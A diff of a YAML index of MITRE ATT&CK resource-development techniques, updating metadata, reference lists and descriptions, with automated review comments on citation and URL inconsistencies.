description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -53865,8 +54527,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -53914,7 +54574,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -53930,7 +54590,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -53989,54 +54648,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -54047,22 +54662,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
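Review bot: the `FireEyeSupplyChain` description still reads `SunshopFireEye. Retrieved March 6, 2017.`, with the report title and the publisher run together; the same text is in the removed lines above, so it is pre-existing upstream ATT&CK data rather than something this change introduces, but it is worth reporting to the source so the regenerated index stops carrying it. The reordering of `external_references` and the `Recorded Future Beacon Certificates` URL and retrieval-date update are consistent with the T1588.002 hunk earlier in the diff.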
@@ -54125,37 +54784,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -54179,11 +54839,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
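Review bot: the new `url` for `GWS Apps Script Abuse 2021` ends in `#google_vignette`, which is a fragment appended by an interstitial ad overlay on bleepingcomputer.com, not part of the article's address. Suggest `url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/` so the reference matches the canonical URL and does not change if the site's ad behaviour does.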
@@ -54241,17 +54904,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -54259,7 +54923,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -54273,7 +54937,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -54306,11 +54970,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
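Review bot: the two new reference entries spell the vendor differently, `source_name: Chexmarx-seo` on the first and `source_name: Checkmarx-oss-seo` on the second. The misspelled name does match the `(Citation: Chexmarx-seo)` used in the T1608.006 description earlier in this diff, so the citation still resolves; if either is corrected to `Checkmarx-seo`, the description's citation and this `source_name` must be changed together or the reference breaks.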
@@ -54332,7 +55003,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54350,47 +55021,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54399,21 +55033,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
@@ -54453,7 +55123,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54472,15 +55142,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
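Review bot: T1588.005 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement, whereas T1584.001 in the following region keeps `x_mitre_attack_spec_version` and raises it to 3.2.0. The removal of `x_mitre_attack_spec_version` coincides with the objects whose `modified` reverts to 2021, which suggests the source data for those objects predates the field; that should be stated explicitly, and it is worth checking that no consumer of this index requires the key to be present. The T1584.001 description change (adding compromise of a cloud service that manages domains, e.g. AWS Route53) reads correctly and is consistent with the `x_mitre_version` bump to '1.4' in the next hunk.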
@@ -54488,19 +55156,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
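Review bot: apart from `x_mitre_version: '1.3'` becoming `'1.4'`, this hunk is key reordering only (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique` and `x_mitre_platforms` change position with unchanged values). If the generator emitted keys in a stable order, for instance the order already used by the untouched objects in this file, future diffs would show only real value changes and be much easier to review.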
@@ -54534,55 +55202,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
